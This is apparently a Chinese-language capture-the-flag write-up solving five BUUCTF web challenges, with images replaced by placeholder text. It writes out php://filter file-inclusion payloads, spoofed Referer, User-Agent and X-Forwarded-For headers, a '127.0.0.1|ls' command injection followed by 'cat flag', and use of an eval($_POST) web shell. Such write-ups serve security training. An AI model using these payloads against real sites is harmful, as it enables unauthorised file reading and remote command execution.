BUUCTF-Writeup

1.Web-[极客大挑战 2019]Secret File

BUUCTF-Writeup
把一切都放在那里了,看到奇怪的背景颜色想到可能会在背景隐藏东西试一下Ctrl+A,果然BUUCTF-Writeup
点击后跳转界面
BUUCTF-Writeup
我们可以找到BUUCTF-Writeup但当我们访问action,php时,会直接跳转到end.php,抓包后可得到

BUUCTF-Writeup
访问可得
BUUCTF-Writeup利用文件包含漏洞(PHP伪协议)
?file=php://filter/read=convert.base64-encode/resource=flag.php
BUUCTF-Writeup解码后即可得到flag

2.[ACTF2020 新生赛]Include

BUUCTF-Writeup点开后发现URL中存在文件包含,题目名字也很直接

我们利用php://filter伪协议进行文件包含
?file=php://filter/read/convert.base64-encode/resource=index.php

?file=php://filter/read/convert.base64-encode/resource=flag.php
即可得到flag

3.[极客大挑战 2019]Http

查看源码找到BUUCTF-Writeup访问发现

BUUCTF-Writeup
在http头里添加referer: https://www.Sycsecret.com
BUUCTF-Writeup修改ua为SycloverBUUCTF-Writeup添加X-Forwarded-for: 127.0.0.1
即可得到flag{4e871159-20f7-45b8-8212-0eba92f7aa5c}

4.[ACTF2020 新生赛]Exec

读源代码发现BUUCTF-Writeup输入127.0.0.1|ls发现啥也没过滤
直接cat flag
BUUCTF-Writeup

5.[极客大挑战 2019]Knife

进来后发现很直接暗示我们用菜刀并且告诉了我们密码
eval($_POST[“Syc”]);
打开菜刀直接连接shell即可得到flag

相关文章:

  • 2022-12-23
  • 2021-06-14
  • 2021-09-30
  • 2019-09-10
  • 2022-02-06
  • 2021-08-28
  • 2021-09-09
  • 2021-08-27
猜你喜欢
  • 2021-10-14
  • 2022-12-23
  • 2021-08-17
  • 2020-07-27
  • 2021-12-28
  • 2021-06-21
  • 2021-07-09
相关资源
相似解决方案